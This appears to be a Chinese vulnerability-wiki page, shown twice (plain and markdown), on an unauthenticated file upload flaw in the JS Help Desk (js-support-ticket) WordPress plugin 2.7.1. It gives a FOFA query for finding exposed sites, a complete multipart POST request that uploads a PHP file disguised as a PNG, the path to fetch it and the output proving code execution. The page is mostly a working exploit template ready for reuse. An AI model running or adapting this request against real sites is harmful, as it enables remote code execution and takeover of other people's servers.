fofamini-wiki

登录白背景

源码

WordPress js-support-ticket存在文件上传漏洞

一、漏洞简介

WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。JS Help Desk是一个专业、简单、易用且完整的客户支持系统。与市场上大多数昂贵（且复杂）的支持票系统相比，JS Help Desk 具有许多功能。JS Help Desk 2.7.1存在未授权上传漏洞。

二、影响版本

JS Help Desk 2.7.1

三、资产测绘

fofa<font style="color:rgb(199, 37, 78);">body="wp-content/plugins/js-support-ticket"</font>
特征

四、漏洞复现

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0 

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="test1.php"
Content-Type: image/png

<?php echo md5(123);unlink(__FILE__);?>
----------767099171--

上传文件位置

GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/test1.php HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

202cb962ac59075b964b07152d234b70

原文: https://www.yuque.com/xiaokp7/ocvun2/ext22ezis9zm6ke0

# WordPress js-support-ticket存在文件上传漏洞

# 一、漏洞简介
WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台，该平台支持在PHP和MySQL的服务器上架设个人博客网站。JS Help Desk是一个专业、简单、易用且完整的客户支持系统。 与市场上大多数昂贵（且复杂）的支持票系统相比，JS Help Desk 具有许多功能。JS Help Desk 2.7.1存在未授权上传漏洞。

# 二、影响版本
+ JS Help Desk 2.7.1

# 三、资产测绘
+ fofa`<font style="color:rgb(199, 37, 78);">body="wp-content/plugins/js-support-ticket"</font>`
+ 特征

![1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676.png](./img/_vgfd5EDsibL5jc4/1711276977635-b8fe060b-0e99-48ae-b5d8-1056b64c4676-628054.png)

# 四、漏洞复现
```plain
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="test1.php"
Content-Type: image/png

<?php echo md5(123);unlink(__FILE__);?>
----------767099171-- 
```

![1712407534796-ee732f50-8faa-4f63-bee3-62c2816b91fa.png](./img/_vgfd5EDsibL5jc4/1712407534796-ee732f50-8faa-4f63-bee3-62c2816b91fa-377155.png)

上传文件位置

```plain
GET /wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/test1.php HTTP/1.1
Host: 
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)
```

![1712407560026-83dcffa9-cc1f-40b0-a955-9a434dd76961.png](./img/_vgfd5EDsibL5jc4/1712407560026-83dcffa9-cc1f-40b0-a955-9a434dd76961-349465.png)

```plain
202cb962ac59075b964b07152d234b70
```

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ext22ezis9zm6ke0>